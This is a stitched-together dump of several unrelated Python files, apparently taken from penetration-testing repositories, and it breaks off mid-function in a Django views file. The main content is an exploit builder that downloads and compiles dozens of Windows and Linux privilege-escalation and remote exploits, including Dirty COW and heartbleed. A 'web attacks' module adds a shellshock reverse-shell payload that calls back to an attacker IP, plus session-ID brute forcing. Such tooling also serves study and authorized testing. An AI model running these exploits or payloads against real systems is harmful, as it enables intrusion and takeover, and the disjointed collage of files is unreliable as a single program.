('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip -O ms10-015.zip'),
('Unpacking...','unzip ms10-015.zip; cp KiTrap0D/vdmallowed.exe ms10-015.exe'),
('Cleaning up...','rm ms10-015.zip; rm -r KiTrap0D')
]
if run(commands):
printGood("ms10-015.exe successfully created\n\t")
def ms10_059():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14610.zip -O ms10-059.zip'),
('Unpacking...','unzip ms10-059.zip'),
('Compiling...','cd Chimichurri; i686-w64-mingw32-g++ Chimichurri.cpp -o ../ms10-059.exe -lws2_32'),
('Cleaning up...','rm ms10-059.zip; rm -r Chimichurri')
]
if run(commands):
printGood("ms10-059.exe successfully created\n\t")
def ms10_092():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/15589 -O ms10-092.wsf'),
]
if run(commands):
printGood("ms10-092.wsf successfully created\n\t - use 'cscript ms10-092.wsf' to execute")
def ms11_080():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/18176 -O ms11-080.py'),
('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms11-080.py'),
('Cleaning up...','cp dist/ms11-080.exe ms11-080.exe; rm ms11-080.py; rm -r dist build ms11-080.spec')
]
if run(commands):
printGood("ms11_080.exe successfully created\n\t")
def ms14_040():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/39525 -O ms14-040.py'),
('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-040.py'),
('Cleaning up...','cp dist/ms14-040.exe ms14-040.exe; rm ms14-040.py; rm -r dist build ms14-040.spec')
]
if run(commands):
printGood("ms14-040.exe successfully created")
def ms14_058_1():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39666.zip -O ms14-058.zip'),
('Unpacking...','unzip ms14-058.zip'),
('Compiling...','cd 39666/Exploit/Exploit; i686-w64-mingw32-g++ Exploit.cpp -o ../../../ms14-058.exe -lws2_32'),
('Cleaning up...','rm ms14-058.zip; rm -r 39666 __MACOSX')
]
if run(commands):
printGood("")
def ms14_058_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/37064 -O ms14-058.py'),
('Converting...','wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-058.py'),
('Cleaning up...','cp dist/ms14-058.exe ms14-058.exe; rm ms14-058.py; rm -r dist build ms14-058.spec')
]
if run(commands):
printGood("ms14-058.exe successfully created\n\t")
def ms14_070_1():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/37755 -O ms14-070.c'),
('Compiling...','i686-w64-mingw32-gcc ms14-070.c -o ms14-070.exe -lws2_32'),
('Cleaning up...','rm ms14-070.c')
]
if run(commands):
printGood("ms14-070.exe successfully created\n\t")
def ms14_070_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/35936 -O ms14-070.py'),
('Note: requires manual fixing, then execute the following command:','echo \'wine "C:\\Python27\\python.exe" /usr/share/pyinstaller/pyinstaller.py --onefile ms14-070.py\'')
]
run(commands)
def ms15_010_1():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39035.zip -O ms15_010.zip'),
('Unpacking...','unzip ms15_010.zip'),
('Fixing...',"cd 39035; sed -i 's/Strsafe.h/strsafe.h/g' main.cpp; sed -i 's/Shlwapi.h/shlwapi.h/g' main.cpp"),
('Compiling...','cd 39035; i686-w64-mingw32-g++ main.cpp -o ../ms15-010.exe'),
('Cleaning up...','rm ms15_010.zip; rm -r 39035')
]
if run(commands):
printGood("ms15-010.exe successfully created\n\t")
def ms15_010_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/37098 -O ms15-010.cpp'),
('Fixing...','head -n 287 ms15-010.cpp > ex.cpp; tail -n 59 ms15-010.cpp > ex.h'),
('Compiling...','i686-w64-mingw32-g++ ex.cpp -o ms15-010.exe'),
('Cleaning up...','rm ms15-010.cpp')
]
if run(commands):
printGood("ms15-010.exe successfully created")
def ms15_051():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe -O ms15-051_32.exe; wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe -O ms15-051_64.exe')
]
if run(commands):
printGood("ms15-051_32.exe and ms15_051_64.exe successfully created")
def ms16_014():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40039.zip -O ms16-014.zip'),
('Unpacking...','unzip ms16-014.zip'),
('Compiling...','cd 40039; i686-w64-mingw32-g++ MS16-014.cpp -o ../ms16-014.exe'),
('Cleaning up...','rm -r ms16-014.zip __MACOSX')
]
if run(commands):
printGood("ms16-014.exe successfully created")
def ms16_016():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39788.zip -O ms16-016.zip'),
('Unpacking...','unzip ms16-016.zip; cd 39788; unzip compiled.zip'),
('Cleaning up...','cp 39788/EoP.exe ms16_016.exe; cp 39788/Shellcode.dll Shellcode.dll;rm ms16-016.zip; rm -r 39788 __MACOSX')
]
if run(commands):
printGood("ms16_016.exe and Shellcode.dll successfully created")
def ms16_032():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/39719 -O ms16_032.ps1')
]
if run(commands):
printGood("ms16_032.ps1 successfully created\n\t - for use with powershell")
exploits_windows_local = [
("windows-privesc-check" , windows_privesc_check),
("ms04-011" , ms04_011_local),
("ms04-019 (1)" , ms04_019_1),
("ms04-019 (2)" , ms04_019_2),
("ms04-019 (3)" , ms04_019_3),
("ms04-020" , ms04_020),
("*keybd_event" , keybd),
("*ms05-018" , ms05_018),
("*ms05-055" , ms05_055),
("ms06-030" , ms06_030),
("ms06-049" , ms06_049),
("print spool service" , spool),
("*ms08-025" , ms08_025),
("netdde" , netdde),
("ms10-015" , ms10_015),
("ms10-059" , ms10_059),
("ms10-092" , ms10_092),
("ms11-080" , ms11_080),
("ms14-040" , ms14_040),
("*ms14-058 (1)" , ms14_058_1),
("ms14-058 (2)" , ms14_058_2),
("*ms14-070 (1)" , ms14_070_1),
("ms14-070 (2)" , ms14_070_2),
("*ms15-010 (1)" , ms15_010_1),
("*ms15-010 (2)" , ms15_010_2),
("ms15-051" , ms15_051),
("*ms16-014" , ms16_014),
("ms16-016" , ms16_016),
("ms16-032" , ms16_032)
]
# ------------------------------------
# LINUX REMOTE
# ------------------------------------
def shellshock():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/34900 -O shellshock.py'),
('Preparing...','chmod 744 shellshock.py')
]
if run(commands):
printGood("shellshock.py successfully created\n\t")
def heartbleed():
commands = [
('Downloading...','wget https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c -O heartbleed.c'),
('Compiling...','gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto'),
('Cleaning up...','rm heartbleed.c')
]
if run(commands):
printGood("heartbleed successfully created\n\tUsage: heartbleed -s <target> -p <port> -f <output file> -v -t 1")
exploits_linux_remote = [
("shellshock" , shellshock),
("heartbleed" , heartbleed)
]
# ------------------------------------
# LINUX LOCAL
# -- These should be compiled on target if possible
# ------------------------------------
def linux_exploit_suggester():
commands = [
('Downloading...','apt-get install linux-exploit-suggester'),
('Cleaning up...','cp /usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl linux-exploit-suggester.pl')
]
if run(commands):
printGood("linux-exploit-suggester.pl successfully created\n\tUsage: perl linux-exploit-suggester.pl -k <kernel>")
def unix_privesc_check():
commands = [
('Downloading...','wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz'),
('Unpacking...','tar xvzf unix-privesc-check-1.4.tar.gz; cp unix-privesc-check-1.4/unix-privesc-check .'),
('Cleaning up...','rm unix-privesc-check-1.4.tar.gz; rm -r unix-privesc-check-1.4')
]
if run(commands):
printGood("unix_privesc_check successfully created")
def sendpage_1():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/9545 -O sendpage.c'),
('Compile with:','echo "gcc -Wall -o sendpage sendpage.c"')
]
run(commands)
def sendpage_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/9479 -O sendpage.c'),
('Compile with:','echo "gcc -Wall -o sendpage sendpage.c"')
]
run(commands)
def ftruncate():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/6851 -O ftruncate.c'),
('Compile with:','echo "gcc -o ftruncate ftruncate.c"'),
('Note: use in world-writable directory, located using the following command:','echo "find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx""')
]
run(commands)
def cap_sys_admin():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/15944 -O cap_sys_admin.c'),
('Compile with:','echo "gcc -w cap_sys_admin.c -o cap_sys_admin_expl"')
]
run(commands)
def compat():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/15024 -O compat.c'),
('Compile with:','echo "gcc -o compat compat.c"')
]
run(commands)
def can_bcm():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/14814 -O can_bcm_expl.c'),
('Compile with:','echo "gcc -o can_bcm_expl can_bcm_expl.c"')
]
run(commands)
def rdsProtocol():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/15285 -O rds_expl.c'),
('Compile with:','echo "gcc -o rds_expl rds_expl.c"')
]
run(commands)
def halfNelson():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/17787 -O half-nelson.c'),
('Compile with:','echo "gcc -o half-nelson half-nelson.c -lrt"')
]
run(commands)
def fullNelson():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/15704 -O full-nelson.c'),
('Compile with:','echo "gcc -o full-nelson full-nelson.c"')
]
run(commands)
def udev():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/8572 -O udev_expl.c'),
('Compile with:','echo "gcc -o udev_expl udev_expl.c"')
]
run(commands)
def sgid():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/33824 -O sgid_expl.c'),
('Compile with:','echo "gcc -o sgid_expl sgid_expl.c"')
]
run(commands)
def overlayfs_1():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/37292 -O overlayfs.c'),
('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
]
run(commands)
def libfutex():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/35370 -O libfutex.c'),
('Compile with:','echo "gcc -o libfutex libfutex.c -lpthread"')
]
run(commands)
def mempodipper():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/18411 -O mempodipper.c'),
('Compile with:','echo "gcc -o mempodipper mempodipper.c"')
]
run(commands)
def alpha_omega():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/17391 -O alpha-omega.c'),
('Compile with:','echo "gcc -o alpha-omega alpha-omega.c"')
]
run(commands)
def dirtycow():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/40616 -O dirtycow_64.c'),
('Fixing...',"cp dirtycow_64.c dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/\/* 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 177;/unsigned int sc_len = 177; *\//g' dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/*\/ 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 136;/unsigned int sc_len = 136;\/*/g' dirtycow_32.c"),
('Compile with:','echo "gcc -o dirtycow_64 dirtycow_64.c -pthread"; echo "gcc -o dirtycow_32 dirtycow_32.c -pthread"')
]
run(commands)
def msr():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/27297 -O msr_expl.c'),
('Compile with:','echo "gcc -o msr_expl msr_expl.c"')
]
run(commands)
def perf_swevent_init():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/26131 -O perf.c'),
('Compile with:','echo "gcc -o perf perf.c"')
]
run(commands)
def overlayfs_2():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/39166 -O overlayfs.c'),
('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
]
run(commands)
def overlayfs_3():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/39230 -O overlayfs.c'),
('Compile with:','echo "gcc -o overlayfs overlayfs.c"')
]
run(commands)
def af_packet():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/40871 -O af_packet.c'),
('Compile with: ','echo "gcc -o af_packet af_packet.c -lpthread"')
]
run(commands)
def double_fdput():
commands = [
('Downloading...','wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip -O double_fdput.zip'),
('Unpacking...','unzip double_fdput.zip; cd 39772; tar xvf exploit.tar;'),
('Compile with: ','echo "cd 39772/ebpf_mapfd_doubleput_exploit; ./compile.sh"'),
('Run ./doubleput','')
]
run(commands)
def netfilter():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/40049 -O netfilter.c'),
('Fixing...','tail -n 50 netfilter.c > pwn.c; head -n 213 netfilter.c > intermediate.c; tail -n 208 intermediate.c > decr.c'),
('Compile with:','echo "gcc -o decr decr.c -m32 -O2; gcc pwn.c -O2 -o pwn"'),
('Run decr, then pwn',''),
('Cleaning up...','rm netfilter.c intermediate.c')
]
run(commands)
def refcount():
commands = [
('Downloading...','wget https://www.exploit-db.com/download/39277 -O refcount.c'),
('Compile with:','echo "gcc -o refcount refcount.c -lkeyutils -Wall"')
]
run(commands)
exploits_linux_local = [
("linux-exploit-suggester" , linux_exploit_suggester),
("unix_privesc_check" , unix_privesc_check),
("kernel 2.4.x / 2.6.x (sock_sendpage 1)" , sendpage_1),
("kernel 2.4 / 2.6 (sock_sendpage 2)" , sendpage_2),
("kernel < 2.6.22 (ftruncate)" , ftruncate),
("kernel < 2.6.34 (cap_sys_admin)" , cap_sys_admin),
("kernel 2.6.27 < 2.6.36 (compat)" , compat),
("kernel < 2.6.36-rc1 (can bcm)" , can_bcm),
("kernel <= 2.6.36-rc8 (rds protocol)" , rdsProtocol),
("*kernel < 2.6.36.2 (half nelson)" , halfNelson),
("*kernel <= 2.6.37 (full nelson)" , fullNelson),
("kernel 2.6 (udev)" , udev),
("kernel 3.13 (sgid)" , sgid),
("kernel 3.13.0 < 3.19 (overlayfs 1)" , overlayfs_1),
("kernel 3.14.5 (libfutex)" , libfutex),
("kernel 2.6.39 <= 3.2.2 (mempodipper)" , mempodipper),
("*kernel 2.6.28 / 3.0 (alpha-omega)" , alpha_omega),
("kernel 2.6.22 < 3.9 (Dirty Cow)" , dirtycow),
("kernel 3.7.6 (msr)" , msr),
("*kernel < 3.8.9 (perf_swevent_init)" , perf_swevent_init),
("kernel <= 4.3.3 (overlayfs 2)" , overlayfs_2),
("kernel 4.3.3 (overlayfs 3)" , overlayfs_3),
("kernel 4.4.0 (af_packet)" , af_packet),
("kernel 4.4.x (double-fdput)" , double_fdput),
("kernel 4.4.0-21 (netfilter)" , netfilter),
("*kernel 4.4.1 (refcount)" , refcount)
]
# ------------------------------------
# UTILITY
# ------------------------------------
def endpoints(i):
try:
i = int(i)
except ValueError:
return 0
if i <= 0:
return 0
elif i == 1:
return len(exploits_windows_remote)
elif i == 2:
return len(exploits_windows_remote) + len(exploits_windows_local)
elif i == 3:
return len(exploits_windows_remote) + len(exploits_windows_local) + len(exploits_linux_remote)
elif i >= 4:
return len(exploits_windows_remote) + len(exploits_windows_local) + len(exploits_linux_remote) + len(exploits_linux_local)
def usage():
print "USAGE: %s <exploit id>" % sys.argv[0]
print "\nWindows Remote Exploits:"
for i in range(endpoints(0), endpoints(1)):
print "%i: %s" % (i, exploits_windows_remote[i-endpoints(0)][0])
print "\nWindows Local Exploits:"
for i in range(endpoints(1), endpoints(2)):
print "%i: %s" % (i, exploits_windows_local[i-endpoints(1)][0])
print "\nLinux Remote Exploits:"
for i in range(endpoints(2), endpoints(3)):
print "%i: %s" % (i, exploits_linux_remote[i-endpoints(2)][0])
print "\nLinux Local Exploits:"
for i in range(endpoints(3), endpoints(4)):
print "%i: %s" % (i, exploits_linux_local[i-endpoints(3)][0])
def select(i):
if i < 0 or i >= endpoints(4):
return False
if i < endpoints(1):
printStep("Constructing %s" % exploits_windows_remote[i-endpoints(0)][0])
exploits_windows_remote[i-endpoints(0)][1]()
elif i < endpoints(2):
printStep("Constructing %s" % exploits_windows_local[i-endpoints(1)][0])
exploits_windows_local[i-endpoints(1)][1]()
elif i < endpoints(3):
printStep("Constructing %s" % exploits_linux_remote[i-endpoints(2)][0])
exploits_linux_remote[i-endpoints(2)][1]()
elif i < endpoints(4):
printStep("Constructing %s" % exploits_linux_local[i-endpoints(3)][0])
exploits_linux_local[i-endpoints(3)][1]()
return True
def run(commands):
try:
for c in commands:
printStep(c[0])
subprocess.check_call(c[1], shell=True)
except subprocess.CalledProcessError:
printErr("Command failed")
return False
except OSError:
printErr("Command failed")
return False
return True
def printStep(s):
print "%s [*] %s %s" % ('\033[93m', s, '\033[0m')
def printErr(s):
print "%s [!] %s %s" % ('\033[91m', s, '\033[0m')
def printGood(s):
print "%s [+] %s %s" % ('\033[92m', s, '\033[0m')
# ------------------------------------
# MAIN
# ------------------------------------
if len(sys.argv) <> 2:
usage()
sys.exit()
try:
success = select(int(sys.argv[1]))
if not success:
print "[-] Invalid selection: %s" % sys.argv[1]
usage()
except ValueError:
print "[-] Invalid selection: %s" % sys.argv[1]
usage()
| 38.618772 | 574 | 0.623516 |
owtf | """
PASSIVE Plugin for Testing for Cross site flashing (OWASP-DV-004)
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Google Hacking for Cross Site Flashing"
def run(PluginInfo):
resource = get_resources("PassiveCrossSiteFlashingLnk")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 27.785714 | 75 | 0.773632 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalRememberPasswordAndReset")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 28.727273 | 75 | 0.788344 |
cybersecurity-penetration-testing | # Reverse Cipher
# http://inventwithpython.com/hacking (BSD Licensed)
message = 'Three can keep a secret, if two of them are dead.'
translated = ''
i = len(message) - 1
while i >= 0:
translated = translated + message[i]
i = i - 1
print(translated) | 21.5 | 62 | 0.643123 |
Effective-Python-Penetration-Testing | import urllib
url = urllib.urlopen("http://packtpub.com/")
response_headers = url.info()
#print response_headers
#print response_headers.keys()
print response_headers['server']
| 24.428571 | 44 | 0.762712 |
Effective-Python-Penetration-Testing | #!/usr/bin/env python
from zapv2 import ZAPv2
from pprint import pprint
import time
target = 'http://example.com/'
zap = ZAPv2()
zap.urlopen(target)
time.sleep(2)
scan = zap.spider.scan(target)
time.sleep(2)
while (int(zap.spider.status(scan)) < 100):
print 'Spider progress %: ' + zap.spider.status(scan)
time.sleep(2)
print 'Spidering completed'
time.sleep(5)
scan = zap.ascan.scan(target)
while (int(zap.ascan.status(scan)) < 100):
print 'Scan progress %: ' + zap.ascan.status(scanid)
time.sleep(5)
print 'Passive Scan completed'
pprint (zap.core.alerts()) | 16.818182 | 57 | 0.693356 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import hashlib
message = raw_input("Enter the string you would like to hash: ")
md5 = hashlib.md5(message)
md5 = md5.hexdigest()
sha1 = hashlib.sha1(message)
sha1 = sha1.hexdigest()
sha256 = hashlib.sha256(message)
sha256 = sha256.hexdigest()
sha512 = hashlib.sha512(message)
sha512 = sha512.hexdigest()
print "MD5 Hash =", md5
print "SHA1 Hash =", sha1
print "SHA256 Hash =", sha256
print "SHA512 Hash =", sha512
print "End of list." | 20 | 64 | 0.701245 |
Penetration_Testing | '''
Collection of web attacks.
'''
import requests
import Queue
import urllib
import subprocess
import socket
from shlex import split
from HTMLParser import HTMLParser
from urlparse import urlparse
'''
Resume allows us to resume a brute-forcing session if our network connectivity is interrupted or the target site goes down.
'''
resume = None
def get_request(target):
req = requests.get(target)
if req.status_code != requests.codes.ok:
raise ValueError("[!] Unable to connect to target.")
else:
print "[*] Successfully connected to target."
def shellshock(target, a_ip, a_port):
s_shock = "() { :;}; /bin/bash -i >& /dev/tcp/{}/{} 0>&1".format(attacker, a_port)
user_agent = s_shock
headers = {'User-Agent': user_agent}
req = requests.post(target, headers=headers)
if req.status_code != requests.codes.ok:
raise ValueError("[!] Unable to execute shellshock t(X_X)t")
else:
print("[+] Target shellshocked. Check your listener. \n")
def build_wordlist(wordlist_file):
with open(wordlist_file, 'rb') as f:
raw_words = f.readlines()
f.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "[*] Resuming word list from: {}".format(resume)
else:
words.put(word)
return words
def dir_fuzzer(url, word_queue, extensions=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
'''
Checking to see if there is a file extension. If not, we know it's a
directory path we're brute-forcing.
'''
if "." not in attempt:
attempt_list.append("/{}/".format(attempt))
else:
attempt_list.append("/{}".format(attempt))
# Brute-forcing extensions
if extensions:
for extension in extensions:
attempt_list.append("/{}{}".format(attempt, extension))
# Iterating over our list of attempts
for brute in attempt_list:
url = "{}{}".format(url, urllib.quote(brute))
try:
req = requests.get(url)
if req.status_code == requests.codes.ok:
print "[{}] => {}".format(req.status_code, url)
except:
pass
def get_robots(target):
req = requests.get(target + "/robots.txt")
if req.status_code != requests.codes.ok:
raise ValueError("[!] Unable to connect to target.")
else:
print "[*] Contents:\n"
print req.text
def test_methods(target):
req = requests.options(target)
if req.status_code != requests.codes.ok:
raise ValueError("[!] OPTIONS method not allowed.\n")
else:
print "[*] Allowed methods:\n"
print req.content
print
# Prompting for file upload
if req.content.find("PUT") != -1 or req.content.find("POST") != -1 or req.content.find("ok") != -1:
do = raw_input("Would you like to upload a file or quit the program?\n")
if "Upload" or "upload" in do:
url = raw_input("Enter the URL to upload the file to: ")
f = raw_input("Enter the filepath of the file to upload: ")
try:
req = requests.post(url, files=f)
print req.text
print
except:
print req.text
print
pass
try:
req = requests.put(url, files=f)
print req.text
print
except:
print req.text
print
pass
else:
print "Quitting now... \n"
sys.exit(0)
def session_hijacker(target):
exists = raw_input("Enter a string that only the admin receives once properly authenticated. (E.g., You are an admin.)\n: ")
c_name = raw_input("Enter the cookie name. (E.g., PHPSESSID)\n: ")
# Iterate over sessions and check if there's one with admin access
for i in range(641):
if i % 10 == 0:
print "[*] Checked", str(i), "sessions."
cookies = {c_name:str(i)}
req = requests.get(target, cookies=cookies)
# If the response page's contents contains the admin-only string
if req.content.find(exists) != -1:
print "[*] Admin session found:", str(i)
print req.content
print
break
print "[*] Successfully brute-forced admin session.\n"
def whois(target):
try:
bash_command = 'whois ' + target
process = subprocess.Popen(bash_command.split(), stdout=subprocess.PIPE)
output, error = process.communicate()
print output
except:
print "\n[!] This functionality is only available in Unix and Linux systems.\n"
def zone_transfer(target):
try:
p1 = subprocess.Popen(split('host -t ns ' + target), stdout=subprocess.PIPE)
p2 = subprocess.Popen(split('cut -d " " -f4'), stdin=p1.stdout, stdout=subprocess.PIPE)
print "[*] Results:"
for server in p2.stdout:
p3 = subprocess.Popen(split('host -l ' + target + ' ' + server), stdin=p2.stdout, stdout=subprocess.PIPE)
p4 = subprocess.Popen(split('grep "has address"'), stdin=p3.stdout, stdout=subprocess.PIPE)
output, error = p4.communicate()
print output
except:
print "\n[!] This functionality is only available in Unix and Linux systems.\n"
class LinkParser(HTMLParser):
def handle_starttag(self, tag, attrs):
if tag == 'a' or 'link':
for (key, value) in attrs:
if key == 'href':
# Grab the new URL
newUrl = "{}{}".format(self.baseUrl, value)
# Add it to collection
self.links += [newUrl]
def get_links(self, url):
self.links = []
self.baseUrl = url
cookies = {cookies1:cookies2}
req = requests.get(url, cookies=cookies)
if "text/html" in req.headers["Content-Type"]:
content = req.content
self.feed(content)
return content, self.links
else:
return "", []
def spider(url, max_pages, word=""):
global cookies1, cookies2
cookies1 = raw_input("Enter the cookie name (Optional): ")
cookies2 = raw_input("Enter the cookie value (Optional): ")
target = [url]
number_visited = 0
found_word = False
print "[*] Pages crawled through:\n"
while number_visited < max_pages and target != [] and not found_word:
number_visited += 1
# Start from the beginning of our collection of pages to visit
url = target[0]
target = target[1:]
try:
print number_visited, url
parser = LinkParser()
data, links = parser.get_links(url)
if data.find(word) > -1:
found_word = True
target += links
except Exception as e:
print "[!] Error:", e
if found_word:
print "\n[*] The word", word, "was found at:", url
see = raw_input("Do you want to see the page content?\nAnswer: ")
if see == "Yes" or "yes" or "Y" or "y":
print "[*] Contents of the URL:", url
print
print data
else:
print "\n[!] Word '", word, "' was not found."
def banner_grab():
website = raw_input("Enter the target website or IP address: ")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((website, 80))
s.send('GET /\n\n')
response = s.recv(1024)
print
print response
| 24.87108 | 128 | 0.596579 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
import threading
import time
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',)
counter=0
class Communicate():
def __init__(self):
pass
def wait_for_event(self,e):
global counter
logging.debug("Wait for counter to become 5")
is_set=e.wait()
logging.debug("Hurray !! Now counter has become %s",counter)
def increment_counter(self,e,wait_time):
global counter
while counter < 10 :
logging.debug("About to increment counter")
if e.is_set() ==False:
e.wait(wait_time)
else:
time.sleep(1)
counter=counter +1
logging.debug("Counter Incremented : %s ",counter)
if counter == 5:
e.set()
obj=Communicate()
e=threading.Event()
t1=threading.Thread(name="Thread 1",target=obj.wait_for_event,args=(e,))
t2=threading.Thread(name="Thread 2",target=obj.increment_counter,args=(e,1))
t1.start()
t2.start()
| 24.833333 | 76 | 0.681378 |
Hands-On-Penetration-Testing-with-Python | # Create your views here.
import subprocess
import os
import signal
import pprint
import sys
import zipfile
import psutil
#from xtreme.crawler import Crawler
from django.http import HttpResponse
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.template import RequestContext
from django.http import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.contrib.auth.decorators import login_required
from XtremeWebAPP.xtreme_server.models import *
from XtremeWebAPP.settings import SITE_ROOT
from django.contrib.auth.views import login, logout
from django.contrib.auth.models import User
#import pdfkit
FINISHED = 'Finished'
IN_PROGRESS = 'In Progress'
STOPPED = 'Stopped'
CRAWLERS = {}
COUNTERS={}
details={}
urll={}
msg={}
timestamp={}
Forms=[]
Form_list=[]
Report_string="<table class=table table-striped table-hover style=width:70%;position:absolute;left:20%;font-size:100%>"
FOLDER_NAME = os.path.dirname(os.path.realpath(__file__))
RUN_CRAWLER_FILE = os.path.join(SITE_ROOT, 'run_crawler.py')
root1=os.path.join(SITE_ROOT,'static')
root=os.path.join(root1,'css')
static_path=root1
css_folder_file1=os.path.join(root, 'bootstrap.css')
css_folder_file2=os.path.join(root, 'dashboard.css')
MANAGE_FILE_FOLDER = os.getcwd()
PRETTY_PRINTER = pprint.PrettyPrinter(indent=4)
List_vuln=[ "Tautology Attack with single quoted string (numeric)",
"Tautology Attack with single quoted string (alpha)",
"Tautology Attack with double quoted string (numeric)",
"Tautology Attack with double quoted string (alpha)",
"Tautology Attack with single quoted string (integer)",
"Tautology Attack with double quoted string (integer)",
"Special character injection (double quote)",
"Special character injection (single quote)",
"Meta character injection (<)",
"Meta character injection (>)",
"Meta character injection (&)",
"Comment injection (<!--)",
"Tag injection",
"CDATA injection (]]>)",
"CDATA injection with script tag",
"CDATA injection with tautology string (single quote)",
"CDATA injection with tautology string (double quote)",
"External entity injection",
"Convert function Single quote",
"Convert function double quote",
"Executable Function injection (single quote)",
"Executable Function injection (double quote)",
"Internal Server Error"
]
Len_List_vect=len(List_vuln)
def home(request):
try:
return render_to_response("index.html", {
'page': 'overview',
}, context_instance=RequestContext(request))
except:
return "error"
def home1(request):
try:
progress = get_progress()
return render_to_response("xml_inj_overview.html", {
'page': 'overview',
'progress': progress
}, context_instance=RequestContext(request))
except:
return "error"
def blind_overview(request):
projects = BlindProject.objects.all()
count = 0
project_wise = []
if len(projects):
# Cool. We have projects!
for project in projects:
count += 1
this_project = {}
this_project['count'] = count
this_project['project_name'] = project.project_name
this_project['project_status'] = project.project_status
if project.success_flg == 'T':
this_project['success_flg'] = 'Yes'
if project.success_flg == 'F':
this_project['success_flg'] = 'No'
if project.success_flg == 'N':
this_project['success_flg'] = 'Error'
project_wise.append(this_project)
return render_to_response("blind_overview.html", {
'page': 'blind_overview',
'projects': project_wise,
}, context_instance=RequestContext(request))
def get_progress():
# See if crawling has completed
try:
remove = []
for project in CRAWLERS:
if CRAWLERS[project].poll() >= 0:
remove.append(project)
for project in remove:
CRAWLERS.pop(project)
project = Project.objects.filter(project_name =
str(project)).update(status = FINISHED)
progress = {}
# Total progress
total = {}
total['finished'] = Project.objects.filter(status = FINISHED).count()
total['inprogress'] = Project.objects.filter(status = IN_PROGRESS).count()
total['vulns'] = 0
total['urls'] = 0
total['processed'] = 0
total['percentage'] = 0
project_wise = []
projects = Project.objects.all()
count = 0
if len(projects):
# Cool. We have projects!
for project in projects:
count += 1
if str(project.status) in [FINISHED, IN_PROGRESS]:
